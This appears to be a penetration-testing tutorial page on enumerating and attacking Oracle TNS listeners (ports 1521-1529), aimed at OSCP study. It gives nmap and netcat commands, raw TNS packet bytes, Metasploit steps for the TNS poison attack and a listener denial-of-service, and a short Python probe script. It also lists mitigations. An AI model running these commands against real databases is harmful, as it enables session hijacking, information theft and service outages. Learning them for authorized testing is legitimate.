Oracle TNS Listener - Port 1521,1522-1529
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
Visit our shop for e-books and courses. π
Support us and buy me a coffee. β
Basic info
Oracle databases are widely used across industries for storing sensitive enterprise data. However, their exposure to the networkβββespecially via the Transparent Network Substrate (TNS) listenerβββcan introduce serious security risks. Oracle TNS operates over default port 1521, but in complex environments, you may encounter instances on 1522β1529 or even beyond. This article provides in-depth techniques for enumerating, exploiting, and securing Oracle TNS listeners, with real-world examples and practical commands.
1. Understanding Oracle TNS and Default Ports
What is TNS?
TNS (Transparent Network Substrate) is Oracleβs proprietary protocol that enables communication between Oracle clients and databases across a network. It allows connections, sessions, and commands like CONNECT
, DATA
, RESOLVE
, etc., to flow through Oracle listeners.
Default Ports
1521βββPrimary default listener port
1522β1529βββOften used for additional listeners, RAC (Real Application Clusters), or other configured services
In real-world Oracle deployments, multiple listener processes may be used for load balancing, high availability, or segregation of duties across applications.
2. Common Vulnerabilities in TNS Listeners
2.1. CVE-2012β1675βββTNS Poison Attack
Description: A critical vulnerability allowing attackers to hijack database sessions by registering rogue services with the listener.
Impact: MITM attacks, data exfiltration, and full control over database traffic.
Mitigation: Use VALID_NODE_CHECKING_REGISTRATION = YES
and restrict registration IPs.
2.2. No Listener Authentication
Many Oracle listeners are deployed with no password or authentication, allowing unauthenticated attackers to:
View service names
Stop, start, or reload the listener
Perform Denial-of-Service (DoS) attacks
2.3. Information Disclosure via Listener STATUS
An attacker can request a STATUS
command to retrieve:
Hostnames
Service names
Instance names
Database version
3. Enumeration Techniques
3.1. Nmap Scanning
Start by identifying open ports and checking for Oracle services.
nmap -sV -p 1521-1529 <target_ip>
Use the Oracle-specific NSE script:
nmap -p 1521 --script oracle-tns-version <target_ip>
3.2. Checking with Metasploit
msfconsole
use auxiliary/admin/oracle/tnslsnr_version
set RHOSTS <target_ip>
set RPORT 1521
run
Output reveals the listener version, hostname, and Oracle SID.
3.3. Using TNSping
Oracle client installations come with tnsping
:
tnsping <listener_alias>
Alternatively, simulate TNSping with Python or Netcat by sending crafted TNS packets.
3.4. Manual Enumeration Using Telnet or Netcat
nc <target_ip> 1521
Send raw TNS packets:
\x00\x00\x00\x36\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x00\x00
You can script this using Python socket
module to brute-force or enumerate SIDs.
4. Exploitation Techniques
4.1. Exploiting TNS Poison Attack (CVE-2012β1675)
Metasploit Module:
use auxiliary/admin/oracle/tnspoison
set RHOSTS <target_ip>
set RPORT 1521
run
Warning: This module may crash the listener or disrupt sessions. Use only in lab or authorized environments.
4.2. Exploiting Unauthenticated Listener Control
If listener commands like STATUS
, STOP
, or RELOAD
are unauthenticated:
use auxiliary/admin/oracle/tnslsnr_version
use auxiliary/admin/oracle/tnslsnr_service
You can perform a Denial-of-Service:
use auxiliary/dos/oracle/tnslsnr_dos
5. Custom Python Script to Enumerate Listener Services
import socket
def send_tns_probe(ip, port):
tns_pkt = b"\x00\x00\x00\x2a\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
try:
s = socket.socket()
s.settimeout(3)
s.connect((ip, port))
s.send(tns_pkt)
response = s.recv(1024)
print(f"[+] Response from {ip}:{port}:\n{response.hex()}")
except Exception as e:
print(f"[-] Failed to connect to {ip}:{port} - {str(e)}")
send_tns_probe("10.0.0.25", 1523)
Learn & practice For the OSCP.
Last updated
Was this helpful?